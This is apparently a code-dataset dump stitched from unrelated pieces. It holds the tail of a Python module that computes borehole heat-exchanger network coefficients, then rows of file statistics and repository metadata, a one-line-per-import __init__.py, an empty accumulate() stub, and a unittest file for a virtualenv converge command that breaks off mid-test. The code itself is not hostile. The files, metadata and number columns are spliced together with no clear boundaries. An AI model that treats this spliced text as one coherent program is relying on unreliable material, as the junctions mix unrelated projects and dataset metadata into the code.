a_in = mix_out @ b_in
a_b = mix_out @ b_b
# Store coefficients
self._set_stored_coefficients(
m_flow_network, cp_f, nSegments, (a_in, a_b), method_id)
return a_in, a_b
def coefficients_borehole_heat_extraction_rate(
self, m_flow_network, cp_f, nSegments):
"""
Build coefficient matrices to evaluate heat extraction rates of all
borehole segments.
Returns coefficients for the relation:
.. math::
\\mathbf{Q_b} =
\\mathbf{a_{in}} T_{f,network,in}
+ \\mathbf{a_{b}} \\mathbf{T_b}
Parameters
----------
m_flow_network : float or (nInlets,) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
cp_f : float
Fluid specific isobaric heat capacity (in J/kg.degC).
nSegments : int or list
Number of borehole segments for each borehole. If an int is
supplied, all boreholes are considered to have the same number of
segments.
Returns
-------
a_in : (nTotalSegments, 1,) array
Array of coefficients for inlet fluid temperature.
a_b : (nTotalSegments, nTotalSegments,) array
Array of coefficients for borehole wall temperatures.
"""
# method_id for coefficients_borehole_heat_extraction_rate is 4
method_id = 4
# Check if stored coefficients are available
if self._check_coefficients(
m_flow_network, cp_f, nSegments, method_id):
a_in, a_b = self._get_stored_coefficients(method_id)
else:
# Update input variables
self._format_inputs(m_flow_network, cp_f, nSegments)
# Coefficient matrices for borehole inlet temperatures:
# [T_{f,b,in}] = [b_in]*[T_{f,n,in}] + [b_b]*[T_{b}]
b_in, b_b = self.coefficients_inlet_temperature(
m_flow_network, cp_f, nSegments)
# Coefficient matrices for borehole heat extraction rates:
# [Q_{b}] = [A]*[T_{f,b,in}] + [B]*[T_{b}]
AB = list(zip(*[
self.p[i].coefficients_borehole_heat_extraction_rate(
self._m_flow_borehole[i],
self._cp_borehole[i],
self.nSegments[i])
for i in range(self.nBoreholes)]))
A = block_diag(*AB[0])
B = block_diag(*AB[1])
# Coefficient matrices for borehole heat extraction rates:
# [Q_{b}] = [a_in]*[T_{f,n,in}] + [a_b]*[T_{b}]
a_in = A @ b_in
a_b = A @ b_b + B
# Store coefficients
self._set_stored_coefficients(
m_flow_network, cp_f, nSegments, (a_in, a_b), method_id)
return a_in, a_b
def coefficients_fluid_heat_extraction_rate(
self, m_flow_network, cp_f, nSegments):
"""
Build coefficient matrices to evaluate heat extraction rates of all
boreholes.
Returns coefficients for the relation:
.. math::
\\mathbf{Q_f} =
\\mathbf{a_{in}} T_{f,network,in}
+ \\mathbf{a_{b}} \\mathbf{T_b}
Parameters
----------
m_flow_network : float or (nInlets,) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
cp_f : float
Fluid specific isobaric heat capacity (in J/kg.degC).
nSegments : int or list
Number of borehole segments for each borehole. If an int is
supplied, all boreholes are considered to have the same number of
segments.
Returns
-------
a_in : (nBoreholes, 1,) array
Array of coefficients for inlet fluid temperature.
a_b : (nBoreholes, nTotalSegments,) array
Array of coefficients for borehole wall temperatures.
"""
# method_id for coefficients_fluid_heat_extraction_rate is 5
method_id = 5
# Check if stored coefficients are available
if self._check_coefficients(
m_flow_network, cp_f, nSegments, method_id):
a_in, a_b = self._get_stored_coefficients(method_id)
else:
# Update input variables
self._format_inputs(m_flow_network, cp_f, nSegments)
# Coefficient matrices for borehole inlet temperatures:
# [T_{f,b,in}] = [b_in]*[T_{f,n,in}] + [b_b]*[T_{b}]
b_in, b_b = self.coefficients_inlet_temperature(
m_flow_network, cp_f, nSegments)
# Coefficient matrices for fluid heat extraction rates:
# [Q_{f}] = [A]*[T_{f,b,in}] + [B]*[T_{b}]
AB = list(zip(*[
self.p[i].coefficients_fluid_heat_extraction_rate(
self._m_flow_borehole[i],
self._cp_borehole[i],
self.nSegments[i])
for i in range(self.nBoreholes)]))
A = block_diag(*AB[0])
B = block_diag(*AB[1])
# Coefficient matrices for fluid heat extraction rates:
# [Q_{f}] = [a_in]*[T_{f,n,in}] + [a_b]*[T_{b}]
a_in = A @ b_in
a_b = A @ b_b + B
# Store coefficients
self._set_stored_coefficients(
m_flow_network, cp_f, nSegments, (a_in, a_b), method_id)
return a_in, a_b
def coefficients_network_heat_extraction_rate(
self, m_flow_network, cp_f, nSegments):
"""
Build coefficient matrices to evaluate total heat extraction rate of
the network.
Returns coefficients for the relation:
.. math::
\\mathbf{Q_{network}} =
\\mathbf{a_{in}} T_{f,network,in}
+ \\mathbf{a_{b}} \\mathbf{T_b}
Parameters
----------
m_flow_network : float or (nInlets,) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
cp_f : float
Fluid specific isobaric heat capacity (in J/kg.degC).
nSegments : int or list
Number of borehole segments for each borehole. If an int is
supplied, all boreholes are considered to have the same number of
segments.
Returns
-------
a_in : (1, 1,) array
Array of coefficients for inlet fluid temperature.
a_b : (1, nTotalSegments,) array
Array of coefficients for borehole wall temperatures.
"""
# method_id for coefficients_network_heat_extraction_rate is 6
method_id = 6
# Check if stored coefficients are available
if self._check_coefficients(
m_flow_network, cp_f, nSegments, method_id):
a_in, a_b = self._get_stored_coefficients(method_id)
else:
# Coefficient matrices for fluid heat extraction rates:
# [Q_{f}] = [b_in]*[T_{f,n,in}] + [b_b]*[T_{b}]
b_in, b_b = self.coefficients_fluid_heat_extraction_rate(
m_flow_network, cp_f, nSegments)
# The total network heat extraction rate is the sum of heat
# extraction rates from all boreholes:
# [Q_{tot}] = [a_in]*[T_{f,n,in}] + [a_b]*[T_{b}]
a_in = np.reshape(np.sum(b_in, axis=0), (1,-1))
a_b = np.reshape(np.sum(b_b, axis=0), (1,-1))
# Store coefficients
self._set_stored_coefficients(
m_flow_network, cp_f, nSegments, (a_in, a_b), method_id)
return a_in, a_b
def _coefficients_mixing(self, m_flow_network):
"""
Returns coefficients for the relation:
.. math::
T_{f,network,out} =
\\mathbf{a_{out}} \\mathbf{T_{f,borehole,out}}
Parameters
----------
m_flow_network : float or (nInlets,) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
Returns
-------
mix_out : (1, nOutlets,) array
Array of coefficients for outlet fluid temperatures of all
boreholes.
"""
if not self._check_mixing_coefficients(m_flow_network):
self._mix_out = np.zeros((1, self.nBoreholes))
self._mix_out[0, self.iOutlets] = self._m_flow_in/np.sum(self._m_flow_in)
self._mixing_m_flow = m_flow_network
return self._mix_out
def _initialize_coefficients_connectivity(self):
"""
Initializes coefficients for the relation:
.. math::
\\mathbf{T_{f,borehole,in}} =
\\mathbf{c_{in}} T_{f,network,in}
+ \\mathbf{c_{out}} \\mathbf{T_{f,borehole,out}}
"""
self._c_in = np.zeros((self.nBoreholes, 1))
self._c_out = np.zeros((self.nBoreholes, self.nBoreholes))
for i in range(self.nInlets):
self._c_in[self.iInlets[i], 0] = 1.
for i in range(self.nBoreholes):
if not self.c[i] == -1:
self._c_out[i, self.c[i]] = 1.
return
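# Illustrative note (added comment): for bore_connectivity = [-1, 0, 1] this
# yields c_in = [[1.], [0.], [0.]] (only borehole 0 sees the network inlet)
# and c_out with ones at (1, 0) and (2, 1), so each downstream borehole takes
# its inlet temperature from the outlet of the borehole feeding it.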
def _initialize_stored_coefficients(self, m_flow_network, cp_f, nSegments):
nMethods = 7 # Number of class methods
self._stored_coefficients = [() for i in range(nMethods)]
self._stored_m_flow_cp = [np.empty(self.nInlets)
for i in range(nMethods)]
self._stored_nSegments = [np.nan for i in range(nMethods)]
self._m_flow_cp_model_variables = np.empty(self.nInlets)
self._nSegments_model_variables = np.nan
self._mixing_m_flow = np.empty(self.nInlets)
self._mixing_m_flow[:] = np.nan
self._mix_out = np.empty((1, self.nBoreholes))
self._mix_out[:] = np.nan
# If m_flow, cp_f, and nSegments are specified, evaluate and store all
# matrix coefficients.
if m_flow_network is not None and cp_f is not None and nSegments is not None:
self.coefficients_inlet_temperature(
m_flow_network, cp_f, nSegments)
self.coefficients_outlet_temperature(
m_flow_network, cp_f, nSegments)
self.coefficients_network_inlet_temperature(
m_flow_network, cp_f, nSegments)
self.coefficients_network_outlet_temperature(
m_flow_network, cp_f, nSegments)
self.coefficients_borehole_heat_extraction_rate(
m_flow_network, cp_f, nSegments)
self.coefficients_fluid_heat_extraction_rate(
m_flow_network, cp_f, nSegments)
self.coefficients_network_heat_extraction_rate(
m_flow_network, cp_f, nSegments)
return
def _set_stored_coefficients(self, m_flow_network, cp_f, nSegments, coefficients,
method_id):
self._stored_coefficients[method_id] = coefficients
self._stored_m_flow_cp[method_id] = m_flow_network*cp_f
self._stored_nSegments[method_id] = nSegments
return
def _get_stored_coefficients(self, method_id):
coefficients = self._stored_coefficients[method_id]
return coefficients
def _check_mixing_coefficients(self, m_flow_network, tol=1e-6):
mixing_m_flow = self._mixing_m_flow
if np.all(np.abs(m_flow_network - mixing_m_flow) < np.abs(mixing_m_flow)*tol):
check = True
else:
check = False
return check
def _check_coefficients(self, m_flow_network, cp_f, nSegments, method_id, tol=1e-6):
stored_m_flow_cp = self._stored_m_flow_cp[method_id]
stored_nSegments = self._stored_nSegments[method_id]
if (np.all(np.abs(m_flow_network*cp_f - stored_m_flow_cp) < np.abs(stored_m_flow_cp)*tol)
and nSegments == stored_nSegments):
check = True
else:
check = False
return check
def _format_inputs(self, m_flow_network, cp_f, nSegments):
"""
Format mass flow rate and heat capacity inputs.
"""
# Format mass flow rate inputs
# Mass flow rate in each fluid circuit
m_flow_in = np.atleast_1d(m_flow_network)
if len(m_flow_in) == 1:
m_flow_in = np.tile(m_flow_network/self.nInlets, self.nInlets)
elif not len(m_flow_in) == self.nInlets:
raise ValueError(
'Incorrect length of mass flow vector.')
self._m_flow_in = m_flow_in
# Format heat capacity inputs
# Heat capacity in each fluid circuit
cp_in = np.atleast_1d(cp_f)
if len(cp_in) == 1:
cp_in = np.tile(cp_f, self.nInlets)
elif not len(cp_in) == self.nInlets:
raise ValueError(
'Incorrect length of heat capacity vector.')
elif not np.all(cp_in == cp_in[0]):
raise ValueError(
'The heat capacity should be the same in all circuits.')
self._cp_in = cp_in
# Mass flow rate in boreholes
m_flow_borehole = np.array([m_flow_in[i] for i in self.iCircuit])
self._m_flow_borehole = m_flow_borehole
# Heat capacity in boreholes
cp_borehole = np.array([cp_in[i] for i in self.iCircuit])
self._cp_borehole = cp_borehole
# Format number of segments for each borehole
nSeg = np.atleast_1d(nSegments)
if len(nSeg) == 1:
self.nSegments = [nSeg[0]] * self.nBoreholes
elif not len(nSeg) == self.nBoreholes:
raise ValueError(
'Incorrect length of number of segments list.')
else:
self.nSegments = nSegments
class _EquivalentNetwork(Network):
"""
Class for networks of equivalent boreholes with parallel connections
between the equivalent boreholes.
Contains information regarding the physical dimensions and thermal
characteristics of the pipes and the grout material in each borehole, the
topology of the connections between boreholes, as well as methods to
evaluate fluid temperatures and heat extraction rates based on the work of
Cimmino (2018, 2019) [#Network-Cimmin2018]_, [#Network-Cimmin2019]_.
Attributes
----------
boreholes : list of Borehole objects
List of boreholes included in the bore field.
pipes : list of pipe objects
List of pipes included in the bore field.
m_flow_network : float or array, optional
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits. This
parameter is used to initialize the coefficients if it is provided.
Default is None.
cp_f : float, optional
Fluid specific isobaric heat capacity (in J/kg.degC). This parameter is
used to initialize the coefficients if it is provided.
Default is None.
nSegments : int, optional
Number of line segments used per borehole. This parameter is used to
initialize the coefficients if it is provided.
Default is None.
Notes
-----
The expected array shapes of input parameters and outputs are documented
for each class method. `nInlets` and `nOutlets` are the number of inlets
and outlets to the network, and both correspond to the number of parallel
circuits. `nTotalSegments` is the sum of the number of discretized segments
along every borehole. `nBoreholes` is the total number of boreholes in the
network.
References
----------
.. [#Network-Cimmin2018] Cimmino, M. (2018). g-Functions for bore fields with
mixed parallel and series connections considering the axial fluid
temperature variations. Proceedings of the IGSHPA Sweden Research Track
2018. Stockholm, Sweden. pp. 262-270.
.. [#Network-Cimmin2019] Cimmino, M. (2019). Semi-analytical method for
g-function calculation of bore fields with series- and
parallel-connected boreholes. Science and Technology for the Built
Environment, 25 (8), 1007-1022.
"""
def __init__(self, equivalentBoreholes, pipes, m_flow_network=None,
cp_f=None, nSegments=None):
self.b = equivalentBoreholes
self.H_tot = sum([b.H*b.nBoreholes for b in self.b])
self.nBoreholes = len(equivalentBoreholes)
self.wBoreholes = np.array([[b.nBoreholes for b in equivalentBoreholes]]).T
self.nBoreholes_total = np.sum(self.wBoreholes)
self.p = pipes
self.c = [-1]*self.nBoreholes
self.m_flow_network = m_flow_network
self.cp_f = cp_f
# Verify that borehole connectivity is valid
iInlets, nInlets, iOutlets, nOutlets, iCircuit = _find_inlets_outlets(
self.c, self.nBoreholes)
# Number of inlets and outlets in network
self.nInlets = nInlets
self.nOutlets = nOutlets
# Indices of inlets and outlets in network
self.iInlets = iInlets
self.iOutlets = iOutlets
# Indices of circuit of each borehole in network
self.iCircuit = iCircuit
# Initialize stored_coefficients
self._initialize_coefficients_connectivity()
self._initialize_stored_coefficients(m_flow_network, cp_f, nSegments)
return
def coefficients_network_heat_extraction_rate(
self, m_flow_network, cp_f, nSegments):
"""
Build coefficient matrices to evaluate total heat extraction rate of
the network.
Returns coefficients for the relation:
.. math::
\\mathbf{Q_{network}} =
\\mathbf{a_{in}} T_{f,network,in}
+ \\mathbf{a_{b}} \\mathbf{T_b}
Parameters
----------
m_flow_network : float or (nInlets,) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
cp_f : float
Fluid specific isobaric heat capacity (in J/kg.degC).
nSegments : int or list
Number of borehole segments for each borehole. If an int is
supplied, all boreholes are considered to have the same number of
segments.
Returns
-------
a_in : (1, 1,) array
Array of coefficients for inlet fluid temperature.
a_b : (1, nTotalSegments,) array
Array of coefficients for borehole wall temperatures.
"""
# method_id for coefficients_network_heat_extraction_rate is 6
method_id = 6
# Check if stored coefficients are available
if self._check_coefficients(
m_flow_network, cp_f, nSegments, method_id):
a_in, a_b = self._get_stored_coefficients(method_id)
else:
# Coefficient matrices for fluid heat extraction rates:
# [Q_{f}] = [b_in]*[T_{f,n,in}] + [b_b]*[T_{b}]
b_in, b_b = self.coefficients_fluid_heat_extraction_rate(
m_flow_network, cp_f, nSegments)
# The total network heat extraction rate is the sum of heat
# extraction rates from all boreholes:
# [Q_{tot}] = [a_in]*[T_{f,n,in}] + [a_b]*[T_{b}]
a_in = np.reshape(np.sum(b_in*self.wBoreholes, axis=0), (1,-1))
a_b = np.reshape(np.sum(b_b*self.wBoreholes, axis=0), (1,-1))
# Store coefficients
self._set_stored_coefficients(
m_flow_network, cp_f, nSegments, (a_in, a_b), method_id)
return a_in, a_b
def _coefficients_mixing(self, m_flow_network):
"""
Returns coefficients for the relation:
.. math::
T_{f,network,out} =
\\mathbf{a_{out}} \\mathbf{T_{f,borehole,out}}
Parameters
----------
m_flow_network : float or (nInlets,) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
Returns
-------
mix_out : (1, nOutlets,) array
Array of coefficients for outlet fluid temperatures of all
boreholes.
"""
if not self._check_mixing_coefficients(m_flow_network):
self._mix_out = np.zeros((1, self.nBoreholes))
self._mix_out[0, self.iOutlets] = \
self._m_flow_in * self.wBoreholes.flatten() \
/ np.sum(self._m_flow_in * self.wBoreholes.flatten())
self._mixing_m_flow = m_flow_network
return self._mix_out
def _format_inputs(self, m_flow_network, cp_f, nSegments):
"""
Format mass flow rate and heat capacity inputs.
"""
# Format mass flow rate inputs
# Mass flow rate in each fluid circuit
m_flow_in = np.atleast_1d(m_flow_network)
if len(m_flow_in) == 1:
m_flow_in = np.array(
[m_flow_network/self.nBoreholes_total for b in self.b])
elif not len(m_flow_in) == self.nInlets:
raise ValueError(
'Incorrect length of mass flow vector.')
self._m_flow_in = m_flow_in
# Format heat capacity inputs
# Heat capacity in each fluid circuit
cp_in = np.atleast_1d(cp_f)
if len(cp_in) == 1:
cp_in = np.tile(cp_f, self.nInlets)
elif not len(cp_in) == self.nInlets:
raise ValueError(
'Incorrect length of heat capacity vector.')
elif not np.all(cp_in == cp_in[0]):
raise ValueError(
'The heat capacity should be the same in all circuits.')
self._cp_in = cp_in
# Mass flow rate in boreholes
m_flow_borehole = np.array([m_flow_in[i] for i in self.iCircuit])
self._m_flow_borehole = m_flow_borehole
# Heat capacity in boreholes
cp_borehole = np.array([cp_in[i] for i in self.iCircuit])
self._cp_borehole = cp_borehole
# Format number of segments for each borehole
nSeg = np.atleast_1d(nSegments)
if len(nSeg) == 1:
self.nSegments = [nSeg[0]] * self.nBoreholes
elif not len(nSeg) == self.nBoreholes:
raise ValueError(
'Incorrect length of number of segments list.')
else:
self.nSegments = nSegments
def network_thermal_resistance(network, m_flow_network, cp_f):
"""
Evaluate the effective bore field thermal resistance.
As proposed in Cimmino (2018, 2019) [#Network-Cimmin2018]_,
[#Network-Cimmin2019]_.
Parameters
----------
network : network object
Model of the network.
m_flow_network : float or (nInlets, ) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
cp_f : float
Fluid specific isobaric heat capacity (in J/kg.degC).
Returns
-------
R_field : float
Effective bore field thermal resistance (m.K/W).
"""
# Number of boreholes
nBoreholes = len(network.b)
# Total borehole length
H_tot = network.H_tot
# Coefficients for T_{f,out} = A_out*T_{f,in} + [B_out]*[T_b], and
# Q_b = [A_Q]*T{f,in} + [B_Q]*[T_b]
A_out, B_out = network.coefficients_network_outlet_temperature(
m_flow_network, cp_f, 1)
A_Q, B_Q = network.coefficients_network_heat_extraction_rate(
m_flow_network, cp_f, 1)
# Effective bore field thermal resistance
R_field = -0.5*H_tot*(1. + A_out)/A_Q
if not np.isscalar(R_field):
R_field = R_field.item()
return R_field
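# Illustrative call (added comment; assumes an already constructed Network
# object `network`, and the flow rate and heat capacity are placeholders):
#   R_field = network_thermal_resistance(
#       network, m_flow_network=0.25, cp_f=4000.)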
def _find_inlets_outlets(bore_connectivity, nBoreholes):
"""
Finds the number of boreholes connected to the inlet and outlet of the
network, together with their indices.
This function raises an error if the supplied borehole connectivity is
invalid.
Parameters
----------
bore_connectivity : list
Index of fluid inlet into each borehole. -1 corresponds to a borehole
connected to the bore field inlet.
nBoreholes : int
Number of boreholes in the bore field.
"""
# Number and indices of inlets
nInlets = bore_connectivity.count(-1)
iInlets = [i for i in range(nBoreholes) if bore_connectivity[i]==-1]
# Number and indices of outlets
iOutlets = [i for i in range(nBoreholes) if i not in bore_connectivity]
nOutlets = len(iOutlets)
iCircuit = [iInlets.index(_path_to_inlet(bore_connectivity, i)[-1])
for i in range(nBoreholes)]
if not nInlets == nOutlets:
raise ValueError(
'The network should have as many inlets as outlets.')
return iInlets, nInlets, iOutlets, nOutlets, iCircuit
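# Illustrative note (added comment): for bore_connectivity = [-1, 0, 1, -1]
# this returns iInlets=[0, 3], nInlets=2, iOutlets=[2, 3], nOutlets=2 and
# iCircuit=[0, 0, 0, 1], i.e. boreholes 0-2 form the first circuit and
# borehole 3 forms the second.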
def _path_to_inlet(bore_connectivity, bore_index):
"""
Returns the path from a borehole to the bore field inlet.
Parameters
----------
bore_connectivity : list
Index of fluid inlet into each borehole. -1 corresponds to a borehole
connected to the bore field inlet.
bore_index : int
Index of borehole to evaluate path.
Returns
-------
path : list
List of boreholes leading to the bore field inlet, starting from
borehole bore_index
"""
# Initialize path
path = [bore_index]
# Index of borehole feeding into borehole (bore_index)
index_in = bore_connectivity[bore_index]
# Stop when bore field inlet is reached (index_in == -1)
while not index_in == -1:
# Add index of upstream borehole to path
path.append(index_in)
# Get index of next upstream borehole
index_in = bore_connectivity[index_in]
return path
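# Illustrative note (added comment): with bore_connectivity = [-1, 0, 1, -1],
# _path_to_inlet(bore_connectivity, 2) returns [2, 1, 0]: borehole 2 is fed
# by borehole 1, which is fed by borehole 0 at the bore field inlet.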
def _verify_bore_connectivity(bore_connectivity, nBoreholes):
"""
Verifies that borehole connectivity is valid.
This function raises an error if the supplied borehole connectivity is
invalid.
Parameters
----------
bore_connectivity : list
Index of fluid inlet into each borehole. -1 corresponds to a borehole
connected to the bore field inlet.
nBoreholes : int
Number of boreholes in the bore field.
"""
if not len(bore_connectivity) == nBoreholes:
raise ValueError(
'The length of the borehole connectivity list does not correspond '
'to the number of boreholes in the bore field.')
if max(bore_connectivity) >= nBoreholes:
raise ValueError(
'The borehole connectivity list contains borehole indices that '
'are not part of the network.')
# Cycle through each borehole and verify that connections lead to -1
# (-1 is the bore field inlet) and that no two boreholes have the same
# index of fluid inlet (except for -1).
for i in range(nBoreholes):
n = 0 # Initialize step counter
# Index of borehole feeding into borehole i
index_in = bore_connectivity[i]
if index_in != -1 and bore_connectivity.count(index_in) > 1:
raise ValueError(
'Two boreholes cannot have the same inlet, except for the '
'network inlet (index of -1).')
# Stop when bore field inlet is reached (index_in == -1)
while not index_in == -1:
index_in = bore_connectivity[index_in]
n += 1 # Increment step counter
# Raise error if n exceeds the number of boreholes
if n > nBoreholes:
raise ValueError(
'The borehole connectivity list is invalid.')
return
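# Minimal usage sketch (illustrative comment, not in the original module;
# `boreholes` and `pipes` are assumed to be lists of pygfunction Borehole and
# pipe objects built elsewhere, and all numeric values are placeholders):
#   network = Network(boreholes, pipes, bore_connectivity=[-1, 0, 1])
#   T_f_out = network.get_network_outlet_temperature(
#       T_f_in=5., T_b=1., m_flow_network=0.25, cp_f=4000., nSegments=12)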
| 40.057122
| 97
| 0.608756
| 7,136
| 53,997
| 4.411295
| 0.044142
| 0.023984
| 0.040789
| 0.029798
| 0.875218
| 0.845707
| 0.827599
| 0.810604
| 0.795451
| 0.789256
| 0
| 0.006733
| 0.312332
| 53,997
| 1,347
| 98
| 40.08686
| 0.841027
| 0.509658
| 0
| 0.593258
| 0
| 0
| 0.032815
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.069663
| false
| 0
| 0.004494
| 0
| 0.141573
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
74ad45807d20f2bb04bbb621c0c105296cfdb112
| 44
|
py
|
Python
|
anime_dl/__init__.py
|
tiagotda/anime-dl
|
d3c114faaa7586b4e1111efa2cf79d4640d4f6a9
|
[
"MIT"
] | 246
|
2017-03-04T20:17:19.000Z
|
2022-03-28T13:37:16.000Z
|
anime_dl/__init__.py
|
EpicUnknown/anime-dl
|
753ae274243c3c4d52050f0c09778d9278112d4a
|
[
"MIT"
] | 114
|
2017-03-05T23:30:04.000Z
|
2021-01-17T03:57:59.000Z
|
anime_dl/__init__.py
|
EpicUnknown/anime-dl
|
753ae274243c3c4d52050f0c09778d9278112d4a
|
[
"MIT"
] | 59
|
2017-03-05T03:00:53.000Z
|
2022-01-08T11:23:21.000Z
|
import common
import external
import sites
| 8.8
| 15
| 0.840909
| 6
| 44
| 6.166667
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.159091
| 44
| 4
| 16
| 11
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
741fb58b993842e8061efc5a082a013cf51143a2
| 27
|
py
|
Python
|
exercises/accumulate/accumulate.py
|
RJTK/python
|
f9678d629735f75354bbd543eb7f10220a498dae
|
[
"MIT"
] | 1
|
2021-05-15T19:59:04.000Z
|
2021-05-15T19:59:04.000Z
|
exercises/accumulate/accumulate.py
|
RJTK/python
|
f9678d629735f75354bbd543eb7f10220a498dae
|
[
"MIT"
] | null | null | null |
exercises/accumulate/accumulate.py
|
RJTK/python
|
f9678d629735f75354bbd543eb7f10220a498dae
|
[
"MIT"
] | 2
|
2018-03-03T08:32:12.000Z
|
2019-08-22T11:55:53.000Z
|
def accumulate():
pass
| 9
| 17
| 0.62963
| 3
| 27
| 5.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.259259
| 27
| 2
| 18
| 13.5
| 0.85
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
74a67040bc142c4f02323aab72be4f8393444d19
| 21,191
|
py
|
Python
|
venvs/tests/test_converge.py
|
Julian/mkenv
|
3e42685c13fa2681ce322a4dd26b4710c292fa51
|
[
"MIT"
] | 9
|
2017-02-05T13:06:55.000Z
|
2018-08-13T12:46:39.000Z
|
venvs/tests/test_converge.py
|
Julian/venvs
|
16fb04e6bd5d22a4af3e03c806d8ff9624f1ad8b
|
[
"MIT"
] | 73
|
2018-08-28T09:56:49.000Z
|
2022-01-30T16:32:24.000Z
|
venvs/tests/test_converge.py
|
Julian/venvs
|
16fb04e6bd5d22a4af3e03c806d8ff9624f1ad8b
|
[
"MIT"
] | 6
|
2018-12-09T22:14:45.000Z
|
2021-03-23T17:52:31.000Z
|
from datetime import datetime, timedelta
from tempfile import NamedTemporaryFile
from unittest import TestCase
import os
from filesystems.exceptions import FileExists
from venvs import _config
from venvs.tests.utils import CLIMixin
class TestConverge(CLIMixin, TestCase):
def test_it_creates_missing_virtualenvs(self):
self.assertFalse(self.locator.for_name("a").exists_on(self.filesystem))
self.assertFalse(self.locator.for_name("b").exists_on(self.filesystem))
self.assertFalse(self.locator.for_name("c").exists_on(self.filesystem))
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
[virtualenv.b]
install = ["foo", "bar", "bla"]
requirements = ["requirements.txt"]
[virtualenv.c]
install = ["foo", "$HOME", "~/a"]
link = ["bar", "baz"]
""",
)
self.run_cli(["converge"])
self.assertEqual(
(
self.installed(self.locator.for_name("a")),
self.installed(self.locator.for_name("b")),
self.installed(self.locator.for_name("c")),
), (
(set(), set()),
({"foo", "bar", "bla"}, {"requirements.txt"}),
(
{
"foo",
os.path.expandvars("$HOME"),
os.path.expanduser("~/a"),
},
set(),
),
),
)
def test_it_converges_existing_virtualenvs(self):
self.assertFalse(self.locator.for_name("a").exists_on(self.filesystem))
self.assertFalse(self.locator.for_name("b").exists_on(self.filesystem))
self.assertFalse(self.locator.for_name("c").exists_on(self.filesystem))
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
install = ["foo", "bar"]
requirements = ["requirements.txt"]
""",
)
self.run_cli(["converge"])
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
install = ["baz", "quux"]
requirements = ["requirements.txt", "other.txt"]
""",
)
self.run_cli(["converge"])
self.assertEqual(
self.installed(self.locator.for_name("a")),
({"baz", "quux"}, {"requirements.txt", "other.txt"}),
)
def test_it_converges_specified_virtualenvs(self):
self.assertFalse(self.locator.for_name("a").exists_on(self.filesystem))
self.assertFalse(self.locator.for_name("b").exists_on(self.filesystem))
self.assertFalse(self.locator.for_name("c").exists_on(self.filesystem))
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
[virtualenv.b]
install = ["foo", "bar", "bla"]
requirements = ["requirements.txt"]
[virtualenv.c]
install = ["foo"]
link = ["bar", "baz"]
""",
)
self.run_cli(["converge", "a", "c"])
self.assertTrue(self.locator.for_name("a").exists_on(self.filesystem))
self.assertFalse(self.locator.for_name("b").exists_on(self.filesystem))
self.assertTrue(self.locator.for_name("c").exists_on(self.filesystem))
self.assertEqual(
(
self.installed(self.locator.for_name("a")),
self.installed(self.locator.for_name("b")),
self.installed(self.locator.for_name("c")),
), (
(set(), set()),
(set(), set()),
({"foo"}, set()),
),
)
def test_it_runs_post_commands(self):
self.assertFalse(self.locator.for_name("a").exists_on(self.filesystem))
file = NamedTemporaryFile(delete=False)
self.addCleanup(os.remove, file.name)
mtime = os.path.getmtime(file.name)
new_mtime = datetime.fromtimestamp(mtime) + timedelta(minutes=10)
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), f"""
[virtualenv.a]
post-commands = [
["true"],
["touch", "-t", "{new_mtime:%Y%m%d%H%M}", "{file.name}"],
]
""",
)
self.run_cli(["converge"])
self.assertTrue(self.locator.for_name("a").exists_on(self.filesystem))
self.assertGreater(os.path.getmtime(file.name), mtime)
def test_it_does_not_run_post_commands_for_already_converged_envs(self):
self.assertFalse(self.locator.for_name("a").exists_on(self.filesystem))
file = NamedTemporaryFile(delete=False)
self.addCleanup(os.remove, file.name)
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), f"""
[virtualenv.a]
post-commands = [
["true"],
["touch", "{file.name}"],
]
""",
